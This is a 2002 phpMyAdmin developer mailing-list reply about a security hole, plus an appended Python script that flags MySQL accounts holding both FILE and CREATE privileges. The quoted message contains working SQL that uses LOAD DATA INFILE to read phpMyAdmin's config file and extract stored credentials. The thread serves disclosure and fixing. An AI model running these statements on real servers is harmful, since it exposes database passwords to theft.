[Phpmyadmin-devel] Re: MAJOR security hole

"Thomas Bähr [Office]" baehr at glaswald.de
Tue Aug 13 02:44:02 CEST 2002


At 13:12 12.08.2002 -0700, you wrote:
>On Mon, 12 Aug 2002, Marc Delisle wrote:
> > > On Mon, 12 Aug 2002, Marc Delisle wrote:
> > > > > I've just merged a fix against that, but it needs some testing since I do
> > > > > not have a machine here which is affected by this security hole.
> > > > you won't like me, but I think we should wait to include a fix for a
> > > > "hole" until a developer can reproduce it.
> > >
> > > I'm going to set up a copy of PMA that exhibits the security hole for us
> > > to test out the bug. Give me a day or two, as I have some more pressing work
> > > at the moment.
> > Robin,
> >
> > the "goto" problem?
> >
> > Marc
>I've checked out the goto problem, and you were right, it is fixed in the
>recent releases. It now limits you to files only in the phpMyAdmin install
>directory. Which can still be a problem in itself I think.
>
>On checking out the other problem with systems totally open using the
>config mechanism, try out this series of SQL Commands:
>
>First time around:
>CREATE TABLE testB ( t mediumtext );
>LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php' INTO TABLE
>testB FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';
>
>Where you need to change the path of the file, and the 'TERMINATED BY'
>parts for your own systems.
>
>When that completes,
>I ran this:
>SELECT * FROM testB WHERE t like '%Server%' AND (t like '%user%' or t like
>'%password%');
>
>To get just the PMA authentication data.
>
>Of course, this exploit requires that the user have the FILE privilege.

AND Create Rights on MYSQL as well ;-)) at least somewhere ;-)

>This would apply to all cases where PMA has been set up with the user as
>root, or anybody else with the FILE privilege.
>
>I'm carrying on looking for more holes along these lines.
>
>--
>Robin Hugh Johnson
>E-Mail     : robbat2 at orbis-terrarum.net
>Home Page  : http://www.orbis-terrarum.net/?l=people.robbat2
>ICQ#       : 30269588 or 41961639
>
>
>
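
A defender's check for the precondition discussed in this thread (the FILE privilege plus CREATE rights somewhere), as an added example that is not part of the original messages or of phpMyAdmin: it parses `SHOW GRANTS` output and lists the accounts that hold both. The function names and the sample grant lines are constructed for illustration.

```python
import re

# Matches one line of SHOW GRANTS output, e.g.
#   GRANT SELECT, FILE ON *.* TO 'pma'@'localhost'
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<user>\S+)",
    re.IGNORECASE,
)

def parse_grants(lines):
    """Return {account: {"file": bool, "create": bool}} from SHOW GRANTS lines."""
    accounts = {}
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        scope = m.group("scope").replace("`", "")
        # Drop column lists such as SELECT (a, b) before splitting on commas.
        privs = re.sub(r"\([^)]*\)", "", m.group("privs")).upper()
        privs = {p.strip() for p in privs.split(",")}
        is_all = bool(privs & {"ALL", "ALL PRIVILEGES"})
        acct = accounts.setdefault(m.group("user"), {"file": False, "create": False})
        # FILE is a global privilege: it only exists at the *.* level.
        if scope == "*.*" and (is_all or "FILE" in privs):
            acct["file"] = True
        # CREATE at any scope gives the account somewhere to make a table.
        if is_all or "CREATE" in privs:
            acct["create"] = True
    return accounts

def can_load_server_files(lines):
    """Accounts holding both FILE and CREATE, the combination named in the thread."""
    return sorted(u for u, p in parse_grants(lines).items() if p["file"] and p["create"])

# Constructed sample input (not taken from any real server).
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'webapp'@'localhost'",
    "GRANT FILE ON *.* TO 'report'@'%'",
    "GRANT SELECT, CREATE ON `reports`.* TO 'report'@'%'",
    "GRANT FILE ON *.* TO 'backup'@'localhost'",
    "GRANT SELECT ON `shop`.* TO 'backup'@'localhost'",
]

if __name__ == "__main__":
    for account in can_load_server_files(SAMPLE_GRANTS):
        print("review:", account)
```

An account flagged here is a candidate for `REVOKE FILE ON *.* FROM ...`, which removes the precondition without touching its table-level rights.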




